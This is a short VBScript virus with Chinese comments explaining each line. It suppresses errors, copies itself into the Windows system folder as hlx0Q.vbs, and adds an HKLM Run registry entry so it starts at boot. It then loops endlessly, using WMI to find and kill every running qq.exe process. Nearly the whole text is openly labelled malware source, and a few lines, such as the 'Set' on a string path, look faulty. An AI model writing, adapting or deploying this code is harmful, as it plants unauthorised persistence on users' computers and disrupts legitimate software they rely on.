'VIRUS CODE STARTS HERE
'-----------------------------------------------------
'容错控制,防止发生异常抛出而导致程序崩溃
On Error Resume Next
'创建文件系统对象
Set fso=CreateObject("Scripting.FileSystemObject")
'获得系统文件夹
Set sysdir=fso.GetSpecialFolder(1)
Set filespec=sysdir&"/hlx0Q.vbs"
'创建Windows脚本壳对象
Set ws=CreateObject("Wscript.Shell")
'将病毒文件拷贝到系统文件夹下并改名
fso.GetFile(WScript.ScriptFullName).Copy(filespec)
'写注册表,设置启动时自动加载项
ws.RegWrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/hlx0Q","hlx0Q.vbs"
'获得QQ服务进程,您可以通过按“Ctrl+Alt+Del”查看进程列表,获得进程映像名称
do
'表示本地主机
strComputer = "."
'获得进程名
strWQL="Select * from Win32_Process Where Name = 'qq.exe'"
'获得VMI对象
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!//" & strComputer & "/root/cimv2")
Set colProcessList = objWMIService.ExecQuery(strWQL)
'在进程列表中枚举目标进程,一旦发现便中断它运行
For Each objProcess in colProcessList
objProcess.Terminate()
Next
loop
'注销对象
Set fso=Nothing
Set sysdir=Nothing
Set ws=Nothing
Set filename=Nothing
Set objWMIService=Nothing
Set objProcess=Nothing